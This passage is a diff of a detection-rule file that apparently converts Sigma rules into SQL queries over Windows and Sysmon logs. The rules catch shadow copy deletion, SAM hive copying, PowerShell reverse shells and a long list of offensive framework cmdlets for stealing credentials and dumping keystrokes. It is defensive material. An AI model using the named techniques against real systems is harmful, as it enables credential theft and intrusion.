'\\' OR ScriptBlockText LIKE '%rcim%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine REGEXP '.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*\\+.*' OR CommandLine REGEXP '.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*\\{.*' OR CommandLine REGEXP '.*\\^.*\\^.*\\^.*\\^.*\\^.*' OR CommandLine REGEXP '.*`.*`.*`.*`.*`.*')) AND NOT ((ParentImage LIKE 'C:\\\\Program Files\\\\Amazon\\\\SSM\\\\ssm-document-worker.exe' ESCAPE '\\') OR ((CommandLine LIKE '%new 
EventSource(\"Microsoft.Windows.Sense.Client.Management\"%' ESCAPE '\\' OR CommandLine LIKE '%public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle);%' ESCAPE '\\'))))" ], - "filename": "posh_ps_susp_win32_shadowcopy_deletion.yml" + "filename": "proc_creation_win_powershell_cmdline_special_characters.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - Powershell", - "id": "86b896ba-ffa1-4fea-83e3-ee28a4c915c7", + "title": "Add Insecure Download Source To Winget", + "id": "81a0ecb5-0a41-4ba1-b2ba-c944eb92bfa2", "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects usage of winget to add a new insecure (http) download source.\nWinget will not allow the addition of insecure sources, hence this could indicate potential suspicious activity (or typos)\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "False positives might occur if the users are unaware of such control checks" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP '(?i).*(set).*&&\\s?set.*(environment|invoke|\\$\\{?input).*&&.*\"')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\' AND CommandLine LIKE '%http://%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_stdin.yml" + "filename": "proc_creation_win_winget_add_insecure_custom_source.yml" }, { - "title": "Create Volume Shadow Copy with Powershell", - "id": 
"afd12fed-b0ec-45c9-a13d-aa86625dac81", + "title": "Potential Privilege Escalation via Service Permissions Weakness", + "id": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981", "status": "test", - "description": "Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information", - "author": "frack113", + "description": "Detect modification of services configuration (ImagePath, FailureCommand and ServiceDLL) in registry by processes with Medium integrity level", + "author": "Teymur Kheirkhabarov", "tags": [ - "attack.credential_access", - "attack.t1003.003" + "attack.privilege_escalation", + "attack.t1574.011" ], "falsepositives": [ - "Legitimate PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%win32\\_shadowcopy%' ESCAPE '\\' AND ScriptBlockText LIKE '%).Create(%' ESCAPE '\\' AND ScriptBlockText LIKE '%ClientAccessible%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND IntegrityLevel = 'Medium' AND CommandLine LIKE '%ControlSet%' ESCAPE '\\' AND CommandLine LIKE '%services%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\ImagePath%' ESCAPE '\\' OR CommandLine LIKE '%\\\\FailureCommand%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ServiceDll%' ESCAPE '\\'))" ], - "filename": "posh_ps_create_volume_shadow_copy.yml" + "filename": "proc_creation_win_registry_privilege_escalation_via_service_key.yml" }, { - "title": "Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell", - "id": "1b9dc62e-6e9e-42a3-8990-94d7a10007f7", - "status": "experimental", - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \\u2014", - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", + 
"title": "Shadow Copies Deletion Using Operating Systems Utilities", + "id": "c947b146-0abc-4c87-9c64-b17e9d7274a2", + "status": "stable", + "description": "Shadow Copies deletion using operating systems utilities", + "author": "Florian Roth (Nextron Systems), Michael Haag, Teymur Kheirkhabarov, Daniil Yugoslavskiy, oscd.community, Andreas Hunkeler (@Karneades)", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.impact", + "attack.t1070", + "attack.t1490" ], "falsepositives": [ - "Unknown" + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason", + "LANDesk LDClient Ivanti-PSModule (PS EncodedCommand)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\$PSHome\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$PSHome\\[' OR ScriptBlockText REGEXP '\\$ShellId\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$ShellId\\[' OR ScriptBlockText REGEXP '\\$env:Public\\[\\s*\\d{1,3}\\s*\\]\\s*\\+\\s*\\$env:Public\\[' OR ScriptBlockText REGEXP '\\$env:ComSpec\\[(\\s*\\d{1,3}\\s*,){2}' OR ScriptBlockText REGEXP '\\*mdr\\*\\W\\s*\\)\\.Name' OR ScriptBlockText REGEXP '\\$VerbosePreference\\.ToString\\('))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR Image LIKE '%\\\\wmic.exe' ESCAPE '\\' OR Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR Image LIKE '%\\\\diskshadow.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll', 'wmic.exe', 'VSSADMIN.EXE', 'diskshadow.exe')) AND (CommandLine LIKE '%shadow%' ESCAPE '\\' AND CommandLine LIKE '%delete%' ESCAPE '\\')) OR ((Image LIKE '%\\\\wbadmin.exe' ESCAPE '\\' OR OriginalFileName = 'WBADMIN.EXE') AND (CommandLine LIKE '%delete%' ESCAPE '\\' AND 
CommandLine LIKE '%catalog%' ESCAPE '\\' AND CommandLine LIKE '%quiet%' ESCAPE '\\'))) OR ((Image LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR OriginalFileName = 'VSSADMIN.EXE') AND (CommandLine LIKE '%resize%' ESCAPE '\\' AND CommandLine LIKE '%shadowstorage%' ESCAPE '\\' AND (CommandLine LIKE '%unbounded%' ESCAPE '\\' OR CommandLine LIKE '%/MaxSize=%' ESCAPE '\\')))))" ], - "filename": "posh_ps_invoke_obfuscation_obfuscated_iex.yml" + "filename": "proc_creation_win_susp_shadow_copies_deletion.yml" }, { - "title": "Powershell Token Obfuscation - Powershell", - "id": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", + "title": "Execution of Suspicious File Type Extension", + "id": "c09dad97-1c78-4f71-b127-7edb2b8e491a", "status": "experimental", - "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", - "author": "frack113", + "description": "Checks whether the image specified in a process creation event doesn't refer to an .exe file (caused by process ghosting or other unorthodox methods to start a process)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027.009" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR ScriptBlockText REGEXP '\"(\\{\\d\\}){2,}\"\\s*-f' OR ScriptBlockText REGEXP '\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}') AND NOT (((ScriptBlockText LIKE '%it will return true or false instead%' ESCAPE '\\' OR ScriptBlockText LIKE '%The function also prevents `Get-ItemProperty` from failing%' ESCAPE '\\')) OR (Path LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Path LIKE '%\\\\bin\\\\servicecontrol.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%`r`n%' 
ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (NOT ((Image LIKE '%.exe' ESCAPE '\\' OR Image LIKE '%.tmp' ESCAPE '\\' OR Image LIKE '%.scr' ESCAPE '\\')) AND NOT ((Image IN ('System', 'Registry', 'MemCompression', 'vmmem')) OR (Image LIKE 'C:\\\\Windows\\\\Installer\\\\MSI%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\DriverStore\\\\FileRepository\\\\%' ESCAPE '\\') OR (Image LIKE 'C:\\\\Config.Msi\\\\%' ESCAPE '\\' AND (Image LIKE '%.rbf' ESCAPE '\\' OR Image LIKE '%.rbs' ESCAPE '\\')) OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND Image LIKE 'C:\\\\Windows\\\\Temp\\\\Helper\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\') AND Image LIKE '%.com' ESCAPE '\\'))) AND NOT ((Image IN ('-', '')) OR (Image = '') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\Avira\\\\%' ESCAPE '\\') OR (Image LIKE '%NVIDIA\\\\NvBackend\\\\%' ESCAPE '\\' AND Image LIKE '%.dat' ESCAPE '\\') OR (Image LIKE '%\\\\WinSCP.com' ESCAPE '\\') OR (Image LIKE '%C:\\\\Users\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\AppData\\\\%' ESCAPE '\\' AND Image LIKE '%.tmp%' ESCAPE '\\' AND Image LIKE '%CodeSetup%' ESCAPE '\\') OR (Image LIKE '%\\\\program\\\\soffice.bin' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\EMC NetWorker\\\\Management\\\\GST\\\\apache\\\\cgi-bin\\\\update\\_jnlp.cgi' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\WINPAKPRO\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\WINPAKPRO\\\\%' ESCAPE '\\') AND Image LIKE '%.ngn' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\MyQ\\\\Server\\\\pcltool.dll' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program 
Files\\\\Microsoft Visual Studio\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Visual Studio%' ESCAPE '\\') AND Image LIKE '%.com' ESCAPE '\\') OR (Image LIKE '%\\\\AppData\\\\Local\\\\Packages\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\LocalState\\\\rootfs\\\\%' ESCAPE '\\') OR (Image LIKE '%\\\\LZMA\\_EXE' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' AND ParentImage LIKE '%\\\\TBT\\_Dock\\_Firmware\\\\GetDockVer32W.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\tobedeleted\\\\%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\UUS\\\\amd64\\\\MoUsoCoreWorker.exe' ESCAPE '\\' AND Image LIKE 'C:\\\\$Extend\\\\$Deleted\\\\%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\OfficeC2RClient.exe%' ESCAPE '\\' AND CommandLine LIKE '%/update UPDATEORCHESTRATOR displaylevel=False%' ESCAPE '\\')))" ], - "filename": "posh_ps_token_obfuscation.yml" + "filename": "proc_creation_win_susp_non_exe_image.yml" }, { - "title": "Suspicious Export-PfxCertificate", - "id": "aa7a3fce-bef5-4311-9cc1-5f04bb8c308c", - "status": "test", - "description": "Detects Commandlet that is used to export certificates from the local certificate store and sometimes used by threat actors to steal private keys from compromised machines", - "author": "Florian Roth (Nextron Systems)", + "title": "Execution Of Non-Existing File", + "id": "71158e3f-df67-472b-930e-7d287acaa3e1", + "status": "experimental", + "description": "Checks whether the image specified in a process creation event is not a full, absolute path (caused by process ghosting or other unorthodox methods to start a process)", + "author": "Max Altgelt (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1552.004" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate certificate exports invoked by administrators or users (depends on processes in the environment - filter if 
unusable)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ScriptBlockText LIKE '%Export-PfxCertificate%' ESCAPE '\\' AND NOT ((ScriptBlockText LIKE '%CmdletsToExport = @(%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND NOT (Image LIKE '%\\\\%' ESCAPE '\\') AND NOT ((Image = '') OR (Image IN ('-', '')) OR (Image IN ('System', 'Registry', 'MemCompression', 'vmmem') OR CommandLine IN ('Registry', 'MemCompression', 'vmmem'))))" ], - "filename": "posh_ps_susp_export_pfxcertificate.yml" + "filename": "proc_creation_win_susp_image_missing.yml" }, { - "title": "AADInternals PowerShell Cmdlets Execution - PsScript", - "id": "91e69562-2426-42ce-a647-711b8152ced6", + "title": "Remote Access Tool - ScreenConnect Backstage Mode Anomaly", + "id": "7b582f1a-b318-4c6a-bf4e-66fe49bf55a5", "status": "experimental", - "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. 
Which can be abused by threat actors to attack Azure AD or Office 365.", - "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects suspicious sub processes started by the ScreenConnect client service, which indicates the use of the so-called Backstage mode", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.reconnaissance", - "attack.discovery", - "attack.credential_access", - "attack.impact" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Legitimate use of the library for administrative activity" + "Case in which administrators are allowed to use ScreenConnect's Backstage mode" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Join-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Open-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Read-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Restore-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Search-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Send-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Update-AADInt%' ESCAPE '\\'))" + 
"SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%ScreenConnect.ClientService.exe' ESCAPE '\\' AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\'))" ], - "filename": "posh_ps_aadinternals_cmdlets_execution.yml" + "filename": "proc_creation_win_remote_access_tools_screenconnect_anomaly.yml" }, { - "title": "Execution via CL_Mutexverifiers.ps1", - "id": "39776c99-1c7b-4ba0-b5aa-641525eee1a4", - "status": "test", - "description": "Detects Execution via runAfterCancelProcess in CL_Mutexverifiers.ps1 module", - "author": "oscd.community, Natalia Shornikova", + "title": "Suspicious DLL Loaded via CertOC.EXE", + "id": "84232095-ecca-4015-b0d7-7726507ee793", + "status": "experimental", + "description": "Detects when a user installs certificates by using CertOC.exe to load the target DLL file.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%CL\\_Mutexverifiers.ps1%' ESCAPE '\\' AND ScriptBlockText LIKE '%runAfterCancelProcess%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\certoc.exe' ESCAPE '\\' OR OriginalFileName = 'CertOC.exe') AND (CommandLine LIKE '% -LoadDLL %' ESCAPE '\\' OR CommandLine LIKE '% /LoadDLL %' ESCAPE '\\') AND (CommandLine LIKE '%\\\\Appdata\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE 
'%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "posh_ps_cl_mutexverifiers_lolscript.yml" + "filename": "proc_creation_win_certoc_load_dll_susp_locations.yml" }, { - "title": "Powershell Add Name Resolution Policy Table Rule", - "id": "4368354e-1797-463c-bc39-a309effbe8d7", + "title": "PowerShell SAM Copy", + "id": "1af57a4b-460a-4738-9034-db68b880c665", "status": "test", - "description": "Detects powershell scripts that adds a Name Resolution Policy Table (NRPT) rule for the specified namespace.\nThis will bypass the default DNS server and uses a specified server for answering the query.\n", - "author": "Borna Talebi", + "description": "Detects suspicious PowerShell scripts accessing SAM hives", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.impact", - "attack.t1565" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unknown" + "Some rare backup scenarios", + "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Add-DnsClientNrptRule%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Namesp%' ESCAPE '\\' AND ScriptBlockText LIKE '%-NameSe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\HarddiskVolumeShadowCopy%' ESCAPE '\\' AND CommandLine LIKE '%System32\\\\config\\\\sam%' ESCAPE '\\' AND (CommandLine LIKE '%Copy-Item%' ESCAPE '\\' OR CommandLine LIKE '%cp $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%cpi $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%copy $\\_.%' ESCAPE '\\' OR CommandLine LIKE '%.File]::Copy(%' ESCAPE '\\'))" ], - "filename": "posh_ps_add_dnsclient_rule.yml" + "filename": "proc_creation_win_powershell_sam_access.yml" }, { - "title": "Malicious PowerShell Commandlets - ScriptBlock", - "id": 
"89819aa4-bbd6-46bc-88ec-c7f7fe30efa6", - "status": "test", - "description": "Detects Commandlet names from well-known PowerShell exploitation frameworks", - "author": "Sean Metcalf, Florian Roth, Bartlomiej Czyz @bczyz1, oscd.community, Nasreddine Bencherchali, Tim Shelton, Mustafa Kaan Demir, Georg Lauenstein, Max Altgelt, Tobias Michalski, Austin Songer", + "title": "Potential Powershell ReverseShell Connection", + "id": "edc2f8ae-2412-4dfd-b9d5-0c57727e70be", + "status": "stable", + "description": "Detects usage of the \"TcpClient\" class. Which can be abused to establish remote connections and reverse-shells. As seen used by the Nishang \"Invoke-PowerShellTcpOneLine\" reverse shell and other.", + "author": "FPT.EagleEye, wagga, Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.discovery", - "attack.t1482", - "attack.t1087", - "attack.t1087.001", - "attack.t1087.002", - "attack.t1069.001", - "attack.t1069.002", - "attack.t1069", "attack.t1059.001" ], "falsepositives": [ - "Unknown" + "In rare administrative cases, this function might be used to check network connectivity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Add-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-RemoteRegBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Add-ScrnSaveBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Check-VM%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-Rc4ByteStream%' ESCAPE '\\' OR ScriptBlockText LIKE '%Decrypt-Hash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Do-Exfiltration%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enabled-DuplicateToken%' ESCAPE '\\' OR ScriptBlockText LIKE '%Exploit-Jboss%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-Fruit%' ESCAPE '\\' OR ScriptBlockText 
LIKE '%Find-GPOLocation%' ESCAPE '\\' OR ScriptBlockText LIKE '%Find-TrustedDocuments%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ApplicationHost%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ChromeDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ClipboardContents%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-FoxDump%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-GPPPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-IndexedItem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Keystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-LSASecret%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-PassHashes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAlwaysInstallElevated%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RegAutoLogon%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteBootKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteCachedCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLocalAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteLSAKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteMachineAccountHash%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RemoteNLKMKey%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-RickAstley%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Screenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SecurityPackages%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceFilePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServicePermission%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-ServiceUnquoted%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-SiteListPassword%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-System%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-TimedScreenshot%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-UnattendedInstallFile%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-Unconstrained%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-USBKeystrokes%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VaultCredential%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnAutoRun%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-VulnSchTask%' ESCAPE '\\' OR 
ScriptBlockText LIKE '%Gupt-Backdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%HTTP-Login%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-ServiceBinary%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-SSP%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ACLScanner%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ADSBackdoor%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AllChecks%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ARPScan%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AzureHound%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BackdoorLNK%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BadPotato%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BetterSafetyKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-BypassUAC%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Carbuncle%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Certify%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ConPtyShell%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-CredentialInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DAFT%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DCSync%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DinvokeKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DllInjection%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DomainPasswordSpray%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-DowngradeAccount%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-EgressCheck%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Eyewitness%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-FakeLogonScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Farmer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Get-RBCD-Threaded%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Gopher%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-Grouper%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-HandleKatz%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonatedProcess%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-ImpersonateSystem%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-InteractiveSystemPowerShell%' 
